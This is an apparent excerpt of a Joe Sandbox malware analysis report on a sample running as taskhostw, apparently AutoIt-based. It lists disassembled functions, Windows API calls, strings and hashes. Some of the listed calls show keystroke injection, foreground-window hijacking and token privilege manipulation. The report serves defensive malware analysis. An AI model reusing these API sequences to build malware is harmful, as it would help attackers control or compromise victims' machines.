Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: d855f64d6ba1d14df2d825fb626498e1e6a321e905821426dc0bdf10f5e448ca
Instruction ID: 1a19ace2efaa3b8b16ed0879d9f33b23b88b33f222cd003f502389b03fc6e732
Opcode Fuzzy Hash: d855f64d6ba1d14df2d825fb626498e1e6a321e905821426dc0bdf10f5e448ca
Instruction Fuzzy Hash: 6211C431610609BBCF14BF64D816BEE77A59F64700F20C82DF941A7182DBB19A159BA0

Function 001F00DE Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 001F00EA

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 0d35cf33cbee3719da8718a8823e93f09c0e47d9e7fa1c97ff4c007130806a22
Instruction ID: c2bb0d6fb7ee6d982ccfa920223b3d920ea5b8c6440aaa4b549348f5263e584c
Opcode Fuzzy Hash: 0d35cf33cbee3719da8718a8823e93f09c0e47d9e7fa1c97ff4c007130806a22
Instruction Fuzzy Hash: C72130B09083418FCB25DF14C884B5BBBE1BF88304F05896CE99A4B722D731E849CB92

Function 001B5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 001B5D76

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e6127d9bb488a62d9aaac33e4b734ca1c172d68a6578498e26eb8c6aac136e2f
Instruction ID: c767088711eddce37ff7f378e15f063b33beba2656be6c76efc6a00898bbb8e0
Opcode Fuzzy Hash: e6127d9bb488a62d9aaac33e4b734ca1c172d68a6578498e26eb8c6aac136e2f
Instruction Fuzzy Hash: 81113631200B019FD3308F55D888BA2B7FAEF45764F10CA2EE5AA86A50D7B1E945CB60

Function 001B5BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001EE071

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8e1bb85ac63864fbec019602ce91a61be3e0d1636a295fffd4c0df93f9d1a386
Instruction ID: 3955f212ec9cc225988ea4da8c556bcea16742896d1093dc757cfa599b64e979
Opcode Fuzzy Hash: 8e1bb85ac63864fbec019602ce91a61be3e0d1636a295fffd4c0df93f9d1a386
Instruction Fuzzy Hash: 57018FB5600942AFC305EB69D541E2AFBAAFF993107148159F819C7702D731EC22CBE0

Function 001D49D3 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 001D4A16

Part of subcall function 001D8CA8: __getptd_noexit.LIBCMT ref: 001D8CA8

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: ed8dc3b6d7d5f955ea564293f38a6657a0578ae111dc2a036396b98a595d747a
Instruction ID: 9044811a90cb48109314cd08246b3471573e87b9f203204b5c37b9d8992ce94e
Opcode Fuzzy Hash: ed8dc3b6d7d5f955ea564293f38a6657a0578ae111dc2a036396b98a595d747a
Instruction Fuzzy Hash: 65F0CD32950255EBDF21AFB48C063EF77A1AF20365F048516F429AB391DBB88A60DF51

Function 001B4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,002752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001B4FDE

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d2388c72c7525ceb3a984bf610d713d90224ed4946c0c1f87dbcbec08cc5c1ee
Instruction ID: 324e9e80ea08eb39b3976ca35d16e1c57b8f3d00b0763252d62809edb805aab3
Opcode Fuzzy Hash: d2388c72c7525ceb3a984bf610d713d90224ed4946c0c1f87dbcbec08cc5c1ee
Instruction Fuzzy Hash: A6F03971505712CFCB389F68E4948A2BBF2AF14329321CA3EE5EA83612C731A840DF40

Function 001D0911 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,001B741D,00000001,00276290,?,001B3BCD,002752F8,002752E0,?,?), ref: 001D0930

Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: b10c3aa23bc83a2d76651d487b6e01130c4db9c52d99c550b3e4e97d305b9747
Instruction ID: f26655e40b77ce1d74dc2a9237d2d0bff672f48aa1d8f721d59e853d00f87c99
Opcode Fuzzy Hash: b10c3aa23bc83a2d76651d487b6e01130c4db9c52d99c550b3e4e97d305b9747
Instruction Fuzzy Hash: AFE0863690512867C720D698AC05FFA77EDDFC86A0F0401B5FC0CD7248DA605C818690

Function 00218F48 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00218F6A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
Instruction ID: fdfdcabc866df33589927f5eeae6975f0d008bb602316bd4f9abc105561c01b5
Opcode Fuzzy Hash: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
Instruction Fuzzy Hash: DDE092B1214B009BDB348E24D8407E373E1AB15304F00081DF29AC3241EB63B882CB59

Function 001B5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 001B5DBF

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: bd2b789c2799d5fb912b928d52706f166211c13cf7c2a581b35d52698fbf6aa9
Instruction ID: 366a9fad03341aa62f0503b11da1e73244263123d768d552bd58d391fd2fb294
Opcode Fuzzy Hash: bd2b789c2799d5fb912b928d52706f166211c13cf7c2a581b35d52698fbf6aa9
Instruction Fuzzy Hash: 86D0C77564020CBFE710DB80ED46FA9777CD705710F100195FD0456290D6F27D508795

Function 001D2DC4 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001D3397: __lock.LIBCMT ref: 001D3399

__onexit_nolock.LIBCMT ref: 001D2DE0

Part of subcall function 001D2E08: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,001D2DE5,001EB73A,00269ED0), ref: 001D2E1B
Part of subcall function 001D2E08: DecodePointer.KERNEL32(?,?,001D2DE5,001EB73A,00269ED0), ref: 001D2E26
Part of subcall function 001D2E08: __realloc_crt.LIBCMT ref: 001D2E67
Part of subcall function 001D2E08: __realloc_crt.LIBCMT ref: 001D2E7B
Part of subcall function 001D2E08: EncodePointer.KERNEL32(00000000,?,?,001D2DE5,001EB73A,00269ED0), ref: 001D2E8D
Part of subcall function 001D2E08: EncodePointer.KERNEL32(001EB73A,?,?,001D2DE5,001EB73A,00269ED0), ref: 001D2E9B
Part of subcall function 001D2E08: EncodePointer.KERNEL32(00000004,?,?,001D2DE5,001EB73A,00269ED0), ref: 001D2EA7

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: 4fc53cdbddac825a099aabbd4814c8b277542188285bf200aa4664f03b7d5ca7
Instruction ID: bd88932d45e4fb41f69be2f2e3843709423eb0c63d0f184048744fae1c4406e0
Opcode Fuzzy Hash: 4fc53cdbddac825a099aabbd4814c8b277542188285bf200aa4664f03b7d5ca7
Instruction Fuzzy Hash: DDD01271D10219AADB10BBA4C90675D76B06F30723F544147F024A62C2CF7847428B91

Function 001D53CB Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 001D53D6

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 0efe7b4cb329139b699956e748f8245a6940664583f87e1a66b457fb2b6e345a
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: F3B0927644020C77CF012A82EC02A493B5AAB507A4F408021FB0C182A2A6B3A660A689

Function 0021D107 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0021D28B

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4a346f61cc4ca40fd8d96ef0dab5176c3ef7f090e6bdeb78141e0f08724e13f6
Instruction ID: bf9f4236a9a78f1c2e04b7ab67fc4625d7f22e3075b61ff32fc41aa71a24d3b2
Opcode Fuzzy Hash: 4a346f61cc4ca40fd8d96ef0dab5176c3ef7f090e6bdeb78141e0f08724e13f6
Instruction Fuzzy Hash: 2A717230214302CFC714EF24C591BEAB7E5AFA8314F44456DF9A69B2A2DB30ED59CB52

Function 001D0D88 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 001D0E37

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 0679dba16b2996da919b765ba8e3cfbd062403a879c0f3bc978dfd24efd3b5db
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: DF31D274A005059BC71ADF98C480A69FBA6FF4D300F698AA6E40ACB355DB30EDC1CB90

Non-executed Functions

Function 0023CB26 Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 001B2612: GetWindowLongW.USER32(?,000000EB), ref: 001B2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0023CBA1
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0023CBFF
GetWindowLongW.USER32(?,000000F0), ref: 0023CC40
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0023CC6A
SendMessageW.USER32 ref: 0023CC93
_wcsncpy.LIBCMT ref: 0023CCFF
GetKeyState.USER32(00000011), ref: 0023CD20
GetKeyState.USER32(00000009), ref: 0023CD2D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0023CD43
GetKeyState.USER32(00000010), ref: 0023CD4D
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0023CD76
SendMessageW.USER32 ref: 0023CD9D
SendMessageW.USER32(?,00001030,?,0023B37C), ref: 0023CEA1
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0023CEB7
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0023CECA
SetCapture.USER32(?), ref: 0023CED3
ClientToScreen.USER32(?,?), ref: 0023CF38
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0023CF45
InvalidateRect.USER32(?,00000000,00000001), ref: 0023CF5F
ReleaseCapture.USER32(?,?,?), ref: 0023CF6A
GetCursorPos.USER32(?), ref: 0023CFA4
ScreenToClient.USER32(?,?), ref: 0023CFB1
SendMessageW.USER32(?,00001012,00000000,?), ref: 0023D00D
SendMessageW.USER32 ref: 0023D03B
SendMessageW.USER32(?,00001111,00000000,?), ref: 0023D078
SendMessageW.USER32 ref: 0023D0A7
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0023D0C8
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0023D0D7
GetCursorPos.USER32(?), ref: 0023D0F7
ScreenToClient.USER32(?,?), ref: 0023D104
GetParent.USER32(?), ref: 0023D124
SendMessageW.USER32(?,00001012,00000000,?), ref: 0023D18D
SendMessageW.USER32 ref: 0023D1BE
ClientToScreen.USER32(?,?), ref: 0023D21C
TrackPopupMenuEx.USER32 ref: 0023D24C
SendMessageW.USER32(?,00001111,00000000,?), ref: 0023D276
SendMessageW.USER32 ref: 0023D299
ClientToScreen.USER32(?,?), ref: 0023D2EB
TrackPopupMenuEx.USER32 ref: 0023D31F

Part of subcall function 001B25DB: GetWindowLongW.USER32(?,000000EB), ref: 001B25EC

GetWindowLongW.USER32(?,000000F0), ref: 0023D3BB

Strings

@GUI_DRAGID, xrefs: 0023CF06
F, xrefs: 0023D29F
pb', xrefs: 0023CF19

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pb'
API String ID: 3977979337-2808172194
Opcode ID: 297e47eaca0dfaf19fb50153249e9fd7ffa858d7d55e6ea580ce3d14bfe0f6aa
Instruction ID: 90b4f06a4e6209225ebf8376dc149b099de9d4596591cd7b0c75a65dc2c0230c
Opcode Fuzzy Hash: 297e47eaca0dfaf19fb50153249e9fd7ffa858d7d55e6ea580ce3d14bfe0f6aa
Instruction Fuzzy Hash: 3A42CDB1614302AFD724CF24E849EAABBF5FF49314F240919F699A72A0C771D864CF52

Function 02A664FE Relevance: 71.5, APIs: 19, Strings: 19, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 02A66723
_memset.LIBCMT ref: 02A66A99
_memmove.LIBCMT ref: 02A66C0C

Strings

+, xrefs: 02A665D1
q, xrefs: 02A6668F
P\K, xrefs: 02AA120E
-, xrefs: 02A66621
o, xrefs: 02A6667B
R, xrefs: 02A6660D
n, xrefs: 02A66671
", xrefs: 02AA25E8
<, xrefs: 02A66603
9, xrefs: 02A665F9
), xrefs: 02A665EF
p, xrefs: 02A66685
{, xrefs: 02A665DB
@, xrefs: 02AA33DE
s{p, xrefs: 02A6712D
, xrefs: 02A66649
0, xrefs: 02A665E5
', xrefs: 02A66617
]K, xrefs: 02AA1178

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memmove$_memset
String ID: $ ]K$"$'$)$+$-$0$9$<$@$P\K$R$n$o$p$q$s{p${
API String ID: 1357608183-3800155241
Opcode ID: 7fb23c0ea95eae181f8063c26a19969d91ab191ae711f17df03a445248dae851
Instruction ID: dfde7f7695087ab10429923978f8605f7b6bdf1f1aa99ff58e0c99e58ededce7
Opcode Fuzzy Hash: 7fb23c0ea95eae181f8063c26a19969d91ab191ae711f17df03a445248dae851
Instruction Fuzzy Hash: AD93A275E00215DFDF24CFA8C895BBDB7B1FF48714F24816AE959AB280EB749981CB40

Function 001B4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 001B4A3D
FindWindowW.USER32 ref: 001ED9BE
IsIconic.USER32(?), ref: 001ED9C7
ShowWindow.USER32(?,00000009), ref: 001ED9D4
SetForegroundWindow.USER32(?), ref: 001ED9DE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001ED9F4
GetCurrentThreadId.KERNEL32 ref: 001ED9FB
GetWindowThreadProcessId.USER32(?,00000000), ref: 001EDA07
AttachThreadInput.USER32(?,00000000,00000001), ref: 001EDA18
AttachThreadInput.USER32(?,00000000,00000001), ref: 001EDA20
AttachThreadInput.USER32(00000000,?,00000001), ref: 001EDA28
SetForegroundWindow.USER32(?), ref: 001EDA2B
MapVirtualKeyW.USER32(00000012,00000000), ref: 001EDA40
keybd_event.USER32 ref: 001EDA4B
MapVirtualKeyW.USER32(00000012,00000000), ref: 001EDA55
keybd_event.USER32 ref: 001EDA5A
MapVirtualKeyW.USER32(00000012,00000000), ref: 001EDA63
keybd_event.USER32 ref: 001EDA68
MapVirtualKeyW.USER32(00000012,00000000), ref: 001EDA72
keybd_event.USER32 ref: 001EDA77
SetForegroundWindow.USER32(?), ref: 001EDA7A
AttachThreadInput.USER32(?,?,00000000), ref: 001EDAA1

Strings

Shell_TrayWnd, xrefs: 001ED9B9

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 6e980be78ec05ad0fdcfb3bb84922ba0f0df38b0567c96a7cbfd60c3a8304ffb
Instruction ID: deef5a3acb684814c4eff75ae3182b39b9d9d61cbfb5ce26eeab3ad3c263ef6f
Opcode Fuzzy Hash: 6e980be78ec05ad0fdcfb3bb84922ba0f0df38b0567c96a7cbfd60c3a8304ffb
Instruction Fuzzy Hash: 1C315271E40318BBEB206F62BD4AF7E7E6CEB44B50F114035FA05AA1D1D6B05911ABA0

Function 00208638 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00208AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00208AED
Part of subcall function 00208AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00208B1A
Part of subcall function 00208AA3: GetLastError.KERNEL32 ref: 00208B27

_memset.LIBCMT ref: 0020867B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002086CD
CloseHandle.KERNEL32(?), ref: 002086DE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002086F5
GetProcessWindowStation.USER32 ref: 0020870E
SetProcessWindowStation.USER32 ref: 00208718
OpenDesktopW.USER32 ref: 00208732

Part of subcall function 002084F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00208631), ref: 00208508
Part of subcall function 002084F3: CloseHandle.KERNEL32(?), ref: 0020851A

Strings

winsta0, xrefs: 002086F0
, xrefs: 0020868A
default, xrefs: 0020872D

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
